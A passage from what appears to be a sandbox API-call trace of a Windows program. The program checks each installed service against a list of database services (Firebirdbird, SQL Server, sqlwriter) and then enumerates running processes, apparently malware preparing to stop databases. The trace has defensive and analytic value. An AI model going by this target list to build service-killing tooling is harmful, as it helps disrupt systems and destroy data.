lpString2="AppXSvc") returned 1 [0161.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0161.767] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0161.767] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0161.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0161.768] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0161.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0161.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0161.768] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0161.768] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0161.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0161.768] lstrlenW (lpString="Audiosrv") returned 8 [0161.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0161.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0161.768] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0161.768] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0161.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0161.768] lstrlenW (lpString="BFE") returned 3 [0161.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0161.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0161.769] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0161.769] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0161.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0161.769] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0161.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0161.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0161.769] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0161.769] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0161.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0161.769] lstrlenW (lpString="CDPSvc") returned 6 [0161.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0161.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0161.769] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0161.769] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0161.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0161.769] lstrlenW (lpString="ClickToRunSvc") returned 13 [0161.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0161.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0161.770] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0161.770] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0161.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0161.770] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0161.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0161.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0161.770] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0161.770] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0161.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0161.770] lstrlenW (lpString="CryptSvc") returned 8 [0161.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0161.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0161.770] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0161.770] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0161.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0161.770] lstrlenW (lpString="DcomLaunch") returned 10 [0161.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0161.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0161.771] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0161.771] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0161.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0161.771] lstrlenW (lpString="DeviceAssociationService") returned 24 [0161.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0161.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0161.771] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0161.771] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0161.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0161.771] lstrlenW (lpString="Dhcp") returned 4 [0161.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0161.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0161.771] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0161.771] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0161.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0161.772] lstrlenW (lpString="Dnscache") returned 8 [0161.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0161.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0161.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0161.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0161.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0161.772] lstrlenW (lpString="DPS") returned 3 [0161.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0161.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0161.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0161.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0161.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0161.772] lstrlenW (lpString="DusmSvc") returned 7 [0161.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0161.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0161.890] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0161.891] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0161.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0161.891] lstrlenW (lpString="EventLog") returned 8 [0161.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0161.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0161.891] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0161.891] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0161.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0161.891] lstrlenW (lpString="EventSystem") returned 11 [0161.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0161.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0161.891] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0161.891] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0161.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0161.891] lstrlenW (lpString="FontCache") returned 9 [0161.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0161.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0161.891] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0161.891] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0161.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0161.891] lstrlenW (lpString="gpsvc") returned 5 [0161.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0161.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0161.892] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0161.892] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0161.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0161.892] lstrlenW (lpString="iphlpsvc") returned 8 [0161.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0161.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0161.892] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0161.892] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0161.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0161.892] lstrlenW (lpString="KeyIso") returned 6 [0161.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0161.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0161.892] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0161.892] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0161.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0161.892] lstrlenW (lpString="LanmanServer") returned 12 [0161.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0161.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0161.892] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0161.892] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0161.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0161.892] lstrlenW (lpString="LanmanWorkstation") returned 17 [0161.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0161.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0161.893] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0161.893] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0161.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0161.893] lstrlenW (lpString="lfsvc") returned 5 [0161.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0161.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0161.893] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0161.893] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0161.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0161.893] lstrlenW (lpString="lmhosts") returned 7 [0161.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0161.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0161.893] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0161.893] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0161.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0161.893] lstrlenW (lpString="LSM") returned 3 [0161.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0161.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0161.909] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0161.909] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0161.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0161.909] lstrlenW (lpString="MpsSvc") returned 6 [0161.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0161.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0161.909] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0161.909] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0161.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0161.909] lstrlenW (lpString="NcbService") returned 10 [0161.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0161.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0161.910] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0161.910] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0161.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0161.910] lstrlenW (lpString="netprofm") returned 8 [0161.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0161.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0161.910] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0161.910] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0161.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0161.910] lstrlenW (lpString="NgcSvc") returned 6 [0161.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0161.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0161.910] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0161.910] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0161.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0161.910] lstrlenW (lpString="NlaSvc") returned 6 [0161.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0161.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0161.910] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0161.911] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0161.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0161.911] lstrlenW (lpString="nsi") returned 3 [0161.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0161.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0161.911] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0161.911] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0161.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0161.911] lstrlenW (lpString="PcaSvc") returned 6 [0161.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0161.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0161.911] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0161.911] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0161.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0161.911] lstrlenW (lpString="PlugPlay") returned 8 [0161.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0161.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0161.911] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0161.911] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0161.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0161.912] lstrlenW (lpString="Power") returned 5 [0161.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0161.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0161.912] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0161.912] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0161.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0161.912] lstrlenW (lpString="ProfSvc") returned 7 [0161.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0161.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0161.912] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0161.912] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0161.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0161.912] lstrlenW (lpString="RpcEptMapper") returned 12 [0161.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0161.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0161.912] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0161.912] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0161.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0161.912] lstrlenW (lpString="RpcSs") returned 5 [0161.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0161.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0161.912] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0161.912] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0161.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0161.913] lstrlenW (lpString="SamSs") returned 5 [0161.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0161.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0161.913] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0161.913] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0161.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0161.913] lstrlenW (lpString="Schedule") returned 8 [0161.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0161.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0161.913] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0161.913] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0161.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0161.913] lstrlenW (lpString="SecurityHealthService") returned 21 [0161.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0161.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0161.914] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0161.914] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0161.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0161.914] lstrlenW (lpString="SENS") returned 4 [0161.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0161.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0161.914] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0161.914] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0161.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0161.914] lstrlenW (lpString="ShellHWDetection") returned 16 [0161.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0161.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0161.914] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0161.914] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0161.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0161.914] lstrlenW (lpString="Spooler") returned 7 [0161.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0161.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0161.914] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0161.914] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0161.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0161.914] lstrlenW (lpString="StateRepository") returned 15 [0161.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0161.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0161.915] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0161.915] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0161.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0161.915] lstrlenW (lpString="SysMain") returned 7 [0161.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0161.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0161.915] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0161.915] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0161.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0161.915] lstrlenW (lpString="SystemEventsBroker") returned 18 [0161.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0161.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0161.915] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0161.915] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0161.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0161.915] lstrlenW (lpString="Themes") returned 6 [0161.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0161.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0161.915] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0161.915] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0161.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0161.915] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0161.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0161.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0161.916] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0161.916] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0161.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0161.916] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0161.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0161.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0161.916] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0161.916] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0161.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4591fc0 | out: hHeap=0x6a0000) returned 1 [0161.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x524 [0161.921] Process32FirstW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.922] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.922] lstrlenW (lpString="System") returned 6 [0161.923] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.932] lstrlenW (lpString="smss.exe") returned 8 [0161.932] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.933] lstrlenW (lpString="csrss.exe") returned 9 [0161.933] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.934] lstrlenW (lpString="wininit.exe") returned 11 [0161.934] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.935] lstrlenW (lpString="csrss.exe") returned 9 [0161.935] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.936] lstrlenW (lpString="winlogon.exe") returned 12 [0161.936] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 